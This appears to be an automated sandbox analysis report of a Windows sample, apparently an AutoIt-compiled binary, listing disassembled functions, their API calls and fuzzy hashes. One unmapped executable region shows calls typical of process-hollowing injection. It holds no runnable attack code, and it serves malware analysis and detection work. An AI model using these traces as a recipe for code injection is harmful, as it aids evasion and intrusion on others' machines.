                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 8a1fad2dc96cfc5bda97f6ddc727d0ae725561dd87fd932f273e0287656629b4
                                                            • Instruction ID: caa6486210b0d8f206d1e634dbd2a0b65927fc9ccba55774fb55dbdc49d9f7c9
                                                            • Opcode Fuzzy Hash: 8a1fad2dc96cfc5bda97f6ddc727d0ae725561dd87fd932f273e0287656629b4
                                                            • Instruction Fuzzy Hash: 1D31C4B1714606AFCB04DF68C8D1EA9B3AAFF48320714862DE419CB791EB30E951CB90
                                                            APIs
                                                            • IsThemeActive.UXTHEME ref: 00694834
                                                              • Part of subcall function 006B336C: __lock.LIBCMT ref: 006B3372
                                                              • Part of subcall function 006B336C: DecodePointer.KERNEL32(00000001,?,00694849,006E7C74), ref: 006B337E
                                                              • Part of subcall function 006B336C: EncodePointer.KERNEL32(?,?,00694849,006E7C74), ref: 006B3389
                                                              • Part of subcall function 006948FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00694915
                                                              • Part of subcall function 006948FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0069492A
                                                              • Part of subcall function 00693B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00693B68
                                                              • Part of subcall function 00693B3A: IsDebuggerPresent.KERNEL32 ref: 00693B7A
                                                              • Part of subcall function 00693B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,007552F8,007552E0,?,?), ref: 00693BEB
                                                              • Part of subcall function 00693B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00693C6F
                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00694874
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                            • String ID:
                                                            • API String ID: 1438897964-0
                                                            • Opcode ID: 56a350be4fda7ebf224d4238b97485256c1da61318cd464c04aebf9898f5225a
                                                            • Instruction ID: 2fbcf9927f45a77e188258380af3d7735e5f6d763810fbc6ffa28aff3bc9745c
                                                            • Opcode Fuzzy Hash: 56a350be4fda7ebf224d4238b97485256c1da61318cd464c04aebf9898f5225a
                                                            • Instruction Fuzzy Hash: B911AFB19183519FCB00EF29D90598EBFE9FF88750F10891EF044832B1DBB59645CB9A
                                                            APIs
                                                              • Part of subcall function 006B571C: __FF_MSGBANNER.LIBCMT ref: 006B5733
                                                              • Part of subcall function 006B571C: __NMSG_WRITE.LIBCMT ref: 006B573A
                                                              • Part of subcall function 006B571C: RtlAllocateHeap.NTDLL(00D10000,00000000,00000001,00000000,?,?,?,006B0DD3,?), ref: 006B575F
                                                            • std::exception::exception.LIBCMT ref: 006B0DEC
                                                            • __CxxThrowException@8.LIBCMT ref: 006B0E01
                                                              • Part of subcall function 006B859B: RaiseException.KERNEL32(?,?,?,00749E78,00000000,?,?,?,?,006B0E06,?,00749E78,?,00000001), ref: 006B85F0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 3902256705-0
                                                            • Opcode ID: 6dc530b375af3ad20da21429f4a5bd1d3d3f973c12e37df47cd7809056ea7f2d
                                                            • Instruction ID: c55898a28deb6bd780b1dc05a2b9925c21b6bdef829508ff0e57457fc48c2c0b
                                                            • Opcode Fuzzy Hash: 6dc530b375af3ad20da21429f4a5bd1d3d3f973c12e37df47cd7809056ea7f2d
                                                            • Instruction Fuzzy Hash: 31F0A4B164022E7ADB10AA94EC059DF7BAE9F01351F50046DF90497282DF70DAC1C7D5
                                                            APIs
                                                              • Part of subcall function 006B8B28: __getptd_noexit.LIBCMT ref: 006B8B28
                                                            • __lock_file.LIBCMT ref: 006B53EB
                                                              • Part of subcall function 006B6C11: __lock.LIBCMT ref: 006B6C34
                                                            • __fclose_nolock.LIBCMT ref: 006B53F6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                            • String ID:
                                                            • API String ID: 2800547568-0
                                                            • Opcode ID: 1bc02314dfd0bc05ed0da270a04e2a142903909eb74ba276bc7ef7902fa397fd
                                                            • Instruction ID: 389a3827113ec2a46d6c23bcbde05bf27edc302ad247b95839d95e828d20351c
                                                            • Opcode Fuzzy Hash: 1bc02314dfd0bc05ed0da270a04e2a142903909eb74ba276bc7ef7902fa397fd
                                                            • Instruction Fuzzy Hash: 19F0BBF1800A049EDB607F7598017ED7BE66F41374F24810DA425AB2C1EFFC89C29B59
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 00D5267B
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D52711
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D52733
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087821724.0000000000D50000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d50000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                            • Instruction ID: ccd43f634bf60ef7f3491c936c654885699c19dfddd26be9fcff22ff5d79e149
                                                            • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                            • Instruction Fuzzy Hash: 1412FE24E24658C6EB24DF60D8507DEB232EF68300F1090E9950DEB7A5E77A4F85CF5A
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction ID: 84471bfe0e58c35ea8e83713446e39cfa22c970e191f7f9979120427cd905cf4
                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction Fuzzy Hash: B131B5B4A001059FE718DF58C4859AAFFA6FB59300B6497A5E80ACB355DB31EDC1DBC0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: 0d9ae4f64fd9f4dec7c4aa11c48f8e1fe013ce3a3653a1f85055acf1f3376f55
                                                            • Instruction ID: 4d29b6d05c949edaf1850a8f3f833481199f9f46fc24fc0a9842bf0d7997d699
                                                            • Opcode Fuzzy Hash: 0d9ae4f64fd9f4dec7c4aa11c48f8e1fe013ce3a3653a1f85055acf1f3376f55
                                                            • Instruction Fuzzy Hash: EF4106B4504341DFDB24DF18C444B5ABBE6BF45318F0988ACE89A8B762C735E845CF96
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: debd4a192cd98d234165f3013593147144481ea24bfc443804d127757904428b
                                                            • Instruction ID: 054a5be6c324ea0b7da593ff42d98c78196b0968b8127d35b80e524bc832a923
                                                            • Opcode Fuzzy Hash: debd4a192cd98d234165f3013593147144481ea24bfc443804d127757904428b
                                                            • Instruction Fuzzy Hash: 5511A531618205AFDB14DF28C585C7EB7AEEF85324724412EE915CB791DB32EC12C794
                                                            APIs
                                                              • Part of subcall function 00694BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00694BEF
                                                              • Part of subcall function 006B525B: __wfsopen.LIBCMT ref: 006B5266
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,007552F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00694E0F
                                                              • Part of subcall function 00694B6A: FreeLibrary.KERNEL32(00000000), ref: 00694BA4
                                                              • Part of subcall function 00694C70: _memmove.LIBCMT ref: 00694CBA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Library$Free$Load__wfsopen_memmove
                                                            • String ID:
                                                            • API String ID: 1396898556-0
                                                            • Opcode ID: c312956e5ae229149ed2d0c5bead3d5220ddd4d8cc21774a11a3981542a9d934
                                                            • Instruction ID: 2c7730a05eefea09d94a8b7e8d27aabe3134c31c884c91e807fd5d94a3952c08
                                                            • Opcode Fuzzy Hash: c312956e5ae229149ed2d0c5bead3d5220ddd4d8cc21774a11a3981542a9d934
                                                            • Instruction Fuzzy Hash: 5A11E331600205ABCF14EF74CC52FAD77AEAF44750F10882DF642A7581DE759A029B58
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: 27b92d2c62374d4c1536b8fda2b5da3750d4c5eb729e3573f64bbb0a5f562993
                                                            • Instruction ID: c03b565496fbd237b64c15ab7a1cbe7be8ad7b878832b698fb83002163f6943c
                                                            • Opcode Fuzzy Hash: 27b92d2c62374d4c1536b8fda2b5da3750d4c5eb729e3573f64bbb0a5f562993
                                                            • Instruction Fuzzy Hash: 0C2157B4908301DFDB14DF64C444B5ABBE6BF88314F05896CF88A47B22D731E809CB96
                                                            APIs
                                                            • __lock_file.LIBCMT ref: 006B48A6
                                                              • Part of subcall function 006B8B28: __getptd_noexit.LIBCMT ref: 006B8B28
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: __getptd_noexit__lock_file
                                                            • String ID:
                                                            • API String ID: 2597487223-0
                                                            • Opcode ID: 1d4469a826abde98d7a5bbf0436d6c1bca6356a4372defea431a35ff09aecd46
                                                            • Instruction ID: 6286abb9428ee9cd47216303801f814cafecaa79a14012f89d15020f2bd2f4d2
                                                            • Opcode Fuzzy Hash: 1d4469a826abde98d7a5bbf0436d6c1bca6356a4372defea431a35ff09aecd46
                                                            • Instruction Fuzzy Hash: 52F08CB1900609ABDF91AFA488067EE36A7AF00325F158418B4249B292CF79C9D1DB55
                                                            APIs
                                                            • FreeLibrary.KERNEL32(?,?,007552F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00694E7E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: a8cb02fb2ff99052b6a92c93d1e78e8bcafe59890637d93a17f04948cc6ceaf3
                                                            • Instruction ID: daff14e69210bc5b888bd6a84953c04967368eddd01eb4d80d60e69bfefdac4c
                                                            • Opcode Fuzzy Hash: a8cb02fb2ff99052b6a92c93d1e78e8bcafe59890637d93a17f04948cc6ceaf3
                                                            • Instruction Fuzzy Hash: C9F01C71505711CFCF349F64D494C96B7EABF143293108A3EE2D682A11CB319882DB40
                                                            APIs
                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006B07B0
                                                              • Part of subcall function 00697BCC: _memmove.LIBCMT ref: 00697C06
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: LongNamePath_memmove
                                                            • String ID:
                                                            • API String ID: 2514874351-0
                                                            • Opcode ID: 706f628aa4925dc7c58257024e25d461e469a112a3bb6e987b280f98a71903fb
                                                            • Instruction ID: fede99259454a54e8992dcdb94d85659d07bf7f327a6bf2a96de9958975c896f
                                                            • Opcode Fuzzy Hash: 706f628aa4925dc7c58257024e25d461e469a112a3bb6e987b280f98a71903fb
                                                            • Instruction Fuzzy Hash: 96E0863690422857CB20965C9C05FEA779DDB896A1F0441B9FC08D7249D9749C808694
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: __wfsopen
                                                            • String ID:
                                                            • API String ID: 197181222-0
                                                            • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                            • Instruction ID: a9d2a39ab5669621a6a2b00928ab17f66a74706e8abb958256a6676894ee2dee
                                                            • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                            • Instruction Fuzzy Hash: 6EB092B644020C77CE022A82EC02B893B1A9B41764F408020FB0C18162A673AAA49A89
                                                            APIs
                                                            • Sleep.KERNELBASE(000001F4), ref: 00D52ED1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087821724.0000000000D50000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d50000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction ID: 2f2d3a2ae5317c148a727b7deb2df07ee0d088cb4cb3559556bfc443bda23baa
                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction Fuzzy Hash: 66E0E67594010DDFDB00EFB8D9496AE7FF4EF04302F100161FD01E2280D6309D548A72
                                                            APIs
                                                              • Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623
                                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0071CB37
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0071CB95
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0071CBD6
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0071CC00
                                                            • SendMessageW.USER32 ref: 0071CC29
                                                            • _wcsncpy.LIBCMT ref: 0071CC95
                                                            • GetKeyState.USER32(00000011), ref: 0071CCB6
                                                            • GetKeyState.USER32(00000009), ref: 0071CCC3
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0071CCD9
                                                            • GetKeyState.USER32(00000010), ref: 0071CCE3
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0071CD0C
                                                            • SendMessageW.USER32 ref: 0071CD33
                                                            • SendMessageW.USER32(?,00001030,?,0071B348), ref: 0071CE37
                                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0071CE4D
                                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0071CE60
                                                            • SetCapture.USER32(?), ref: 0071CE69
                                                            • ClientToScreen.USER32(?,?), ref: 0071CECE
                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0071CEDB
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0071CEF5
                                                            • ReleaseCapture.USER32 ref: 0071CF00
                                                            • GetCursorPos.USER32(?), ref: 0071CF3A
                                                            • ScreenToClient.USER32(?,?), ref: 0071CF47
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0071CFA3
                                                            • SendMessageW.USER32 ref: 0071CFD1
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0071D00E
                                                            • SendMessageW.USER32 ref: 0071D03D
                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0071D05E
                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0071D06D
                                                            • GetCursorPos.USER32(?), ref: 0071D08D
                                                            • ScreenToClient.USER32(?,?), ref: 0071D09A
                                                            • GetParent.USER32(?), ref: 0071D0BA
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0071D123
                                                            • SendMessageW.USER32 ref: 0071D154
                                                            • ClientToScreen.USER32(?,?), ref: 0071D1B2
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0071D1E2
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0071D20C
                                                            • SendMessageW.USER32 ref: 0071D22F
                                                            • ClientToScreen.USER32(?,?), ref: 0071D281
                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0071D2B5
                                                              • Part of subcall function 006925DB: GetWindowLongW.USER32(?,000000EB), ref: 006925EC
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0071D351
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                            • String ID: @GUI_DRAGID$F$pbu
                                                            • API String ID: 3977979337-570719866
                                                            • Opcode ID: d8263cd1824fe6a907e980f31057dbab799c39da0b20a2ed84037a20a0c98a09
                                                            • Instruction ID: ccf3b5ee587db2931619d9c7dcde35cc488771438e3d2e4ba75be0d855a440f1
                                                            • Opcode Fuzzy Hash: d8263cd1824fe6a907e980f31057dbab799c39da0b20a2ed84037a20a0c98a09
                                                            • Instruction Fuzzy Hash: D142AB74208381AFDB22CF68C845AEABBE5FF48310F144929F555C72E0C779E894DB96
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: _memmove$_memset
                                                            • String ID: ]t$3cj$DEFINE$P\t$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_j
                                                            • API String ID: 1357608183-1184944521
                                                            • Opcode ID: 79d3775b63f94249b06fb2d3ba21367a916275ddc27a77032064103aaa19006b
                                                            • Instruction ID: f9d5cf575807fe259e6a7e8702e641172addec92aaf6a8883887e6550d2b1609
                                                            • Opcode Fuzzy Hash: 79d3775b63f94249b06fb2d3ba21367a916275ddc27a77032064103aaa19006b
                                                            • Instruction Fuzzy Hash: 0A93A171A01356DBDB24DF59C891BEDB7B2FF49310F24816AE945AB381E7709E82CB40
                                                            APIs
                                                            • GetForegroundWindow.USER32(00000000,?), ref: 006948DF
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006CD665
                                                            • IsIconic.USER32(?), ref: 006CD66E
                                                            • ShowWindow.USER32(?,00000009), ref: 006CD67B
                                                            • SetForegroundWindow.USER32(?), ref: 006CD685
                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 006CD69B
